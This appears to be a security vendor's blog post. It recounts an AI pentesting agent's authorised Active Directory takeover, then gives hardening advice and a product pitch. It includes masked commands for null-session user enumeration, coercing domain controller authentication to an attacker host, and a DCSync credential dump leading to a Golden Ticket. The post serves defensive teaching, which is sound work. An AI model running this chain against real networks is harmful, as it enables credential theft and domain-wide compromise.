On a recent UK engagement, Nebula started from a single low-privileged domain account with no administrative rights and finished with the keys to the entire Active Directory forest. It happened live, on production, without a destructive action, and every step was backed by captured evidence. This post walks the chain it used. The client, domain, hosts, IP addresses, and account names are fully anonymised; only the techniques and the public references are real.
The point is not that these individual weaknesses are new. Each one is well documented. The point is that a scanner sees them as a handful of medium findings, while an attacker (or an AI that reasons like one) chains them into total compromise in under a minute.
Background
Active Directory is the identity backbone of most Windows estates. A "Domain Admin" can read every secret, log in to every host, and persist indefinitely. The shortest path to that level rarely runs through a single critical CVE. It runs through a sequence of small misconfigurations that are individually low risk and collectively fatal.
Three of those misconfigurations did the work here:
- Authentication coercion is reachable. A low-privileged account can force a domain controller to authenticate to a machine the attacker controls (see MITRE ATT&CK T1187).
- NetNTLMv1 is still accepted. The weak, downgraded NTLM response can be cracked back to the original NT hash.
- SMB signing is not enforced, and the
krbtgtaccount password has not rotated in years, which keeps forged tickets valid for a very long time.
How it works
The chain ran in six steps. Tool output below is representative and masked.
Rendering diagram
| Step | Technique | What it achieved |
|---|---|---|
| 1. Foothold | Initial Access | A single low-privileged domain account, no admin rights |
| 2. Enumeration | T1087 | Anonymous SMB null session listed the full domain user directory, with descriptions that flagged the privileged accounts |
| 3. Coercion | T1187 | DFSCoerce (MS-DFSNM) forced the domain controller machine account to authenticate to an attacker host |
| 4. Capture and crack | T1110 | The coerced NetNTLMv1 response was cracked to recover the DC machine-account NT hash |
| 5. DCSync | T1003.006 | Pass-the-hash as the DC account replicated every domain hash, including krbtgt |
| 6. Golden Ticket | T1558.001 | A ticket forged from the krbtgt key was validated live against the production DC, then deleted |
The enumeration step required no credentials at all:
nxc smb <dc> -u '' -p '' --users
# returns the full domain user list, last-password-set, and descriptions
The coercion and DCSync steps turned a low-privileged user into a domain replica:
coercer coerce -t <dc> -l <attacker> -u <low-priv> # force DC auth, capture NetNTLMv1
# crack the NetNTLMv1 response to the DC machine-account NT hash
impacket-secretsdump -hashes :<dc-hash> <domain>/<dc>$@<dc> -just-dc
# dumps every account hash, including krbtgt
With the krbtgt key in hand, a Golden Ticket grants any identity in the domain. It was forged offline, validated against the live DC for full administrative share access, and removed afterward per the engagement cleanup rules.
Why it matters
No single finding here would top a scanner report. Coercion surfaces, NetNTLMv1, missing SMB signing, and a stale krbtgt are routine "medium" items that sit in backlogs for months. Chained, they are a complete path from a help-desk-tier account to forest-wide control.
This is the gap between "the scan passed" and "we are safe." Signature tools enumerate issues. They do not reason about how those issues combine, so the most dangerous attack path, the one a real adversary actually walks, is the one they never surface.
What to do
These are concrete, high-impact hardening steps for the chain above.
- Block coercion. Apply the mitigations in Microsoft advisory ADV210003 and patch MS-DFSNM and MS-EFSR coercion paths. Restrict which accounts can reach those RPC interfaces.
- Kill NetNTLMv1. Set the LAN Manager authentication level to refuse LM and NTLMv1 (
LmCompatibilityLevel). It is a decades-old downgrade that should not exist on a modern domain. - Enforce SMB signing on domain controllers and member servers so coerced authentication cannot be relayed.
- Rotate
krbtgttwice, then put it on a schedule. Akrbtgtthat has not changed in years means every previously forged ticket may still work. - Deploy LAPS and tier your admin accounts so a single foothold cannot pivot estate-wide.
- Test the chain, not the checklist. Validate that these controls actually break the path end to end, rather than confirming each box in isolation.
How Breachline helps
Nebula is an AI security engineer that tests the full stack the way an attacker does. It does not just list the coercion surface and the stale krbtgt as separate findings. It chains them, proves the result with a working, non-destructive exploit in an isolated sandbox, and reports the exact path with reproduction steps mapped to MITRE ATT&CK. Then it retests after you fix it. Continuous, scope-locked, and human-approved for anything risky.
Takeaways
- Domain takeover is usually a chain of "medium" findings, not one critical CVE.
- Coercion plus NetNTLMv1 plus weak SMB signing plus a stale
krbtgtis a full path to Domain Admin. - Test how weaknesses combine, and prove the fix actually breaks the path.
